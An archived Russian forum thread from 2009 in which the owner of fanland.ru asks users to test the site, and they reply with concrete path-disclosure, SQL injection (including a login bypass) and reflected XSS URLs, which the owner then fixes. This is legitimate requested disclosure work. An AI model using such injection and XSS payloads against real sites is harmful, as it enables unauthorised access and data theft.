PDA

Просмотр полной версии : Fanland.ru

ВолкS
18.01.2009, 17:06
Проверьте, пожалуйста, на уязвимости различные http://fanland.ru
BlackSun
18.01.2009, 18:25
Раскрытие путей
http://fanland.ru/news.php?usr='&pwd='%20--%20
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=3&tema=-1'&id=look_t
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=-1'&user=BlackKogep&tema=46&id=create_p
http://fanland.ru/?usr=valid user&pwd=valid pass (bzz, wtf 0_o)
В поиске тоже самое

SQL-INJ
http://fanland.ru/news.php?usr='+or+1%3d'1&pwd='%20--%20

XSS
http://fanland.ru/news.php?usr='+or+1%3d'1'%20--%20'>"><script>alert()</script><noscript>&pwd='%20--%20

sql-inj в действии
http://fanland.ru/msg.php?usr=West'%20--%20&pwd=b46641af0203c864a8f5c44f2ab9c250&id=read

------------------------
Дальше копать не буду, там этого добра еще навалом. На доработку, потом заходите снова
kolpeex
19.01.2009, 13:04
снова раскрытие путей
http://fanland.ru/info_m.php?usr[]=LegionDEAD&pwd=[скрыто]&man=LegionDEAD
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /[path]/fanland.ru/info_m.php on line 15

http://fanland.ru/forum.php?usr=kolpeex&pwd=[скрыто]&razd=[здесь]&user=DAMBOLDOR&tema=[и здесь]&id=create_p

С темой WEB и кавычкой в пароле сайт уходит в бесконечную рекурсию, загрязняя мой кэш.
ВолкS
19.01.2009, 13:19
Спасибо всем отписавшимся. Ща на другой сервер будем переезжать, заодно на день-два закроем на устранение уязвимостей. Еще раз спасибо!
ronald
19.01.2009, 16:44
может и бесполезно, но вот: http://fanland.ru/info_1.php на момент отписывания поста выскакивает ошибка при переходе туды
LiraS
08.02.2009, 14:06
В прошлый раз создавал сдесь тему мой хороший друг, тогда много ошибок нашли попросили доработать, я конечно вроде все вами сказанные ошибки исправил, но все же просьба еще раз проверить скрипт, так как я мог допустить также много ошибок, так как сам я самоучка, нигде не учился...Кстате вот адресок: http://fanland.ru
Maestus
08.02.2009, 21:15
Пассивный XSS
http://fanland.ru/info_m.php?usr=[any username]&pwd=[any password]&man=617"><script>alert(33)</script>
http://fanland.ru/anketa.php?usr=[any username]&pwd=[any pass]&man=618"><script>alert(23)</script>
LiraS
08.02.2009, 23:18
Спасибо, исправил ошибки, если есть еще, то пишите буду благодарен
Maestus
09.02.2009, 00:46
SQL инъекция
1./chat.php
1.1 http://fanland.ru/chat.php?pwd=password&usr=username'
1.2 http://fanland.ru/chat.php?usr=username&pwd=password'
2./smile.php
2.1 http://fanland.ru/smile.php?pwd=password&id=&usr=username'+and+'a'='a
2.2 http://fanland.ru/smile.php?usr=username&id=&pwd=password'
LiraS
09.02.2009, 21:08
Спасибо, исправил, если найдете еще, то буду благодарен.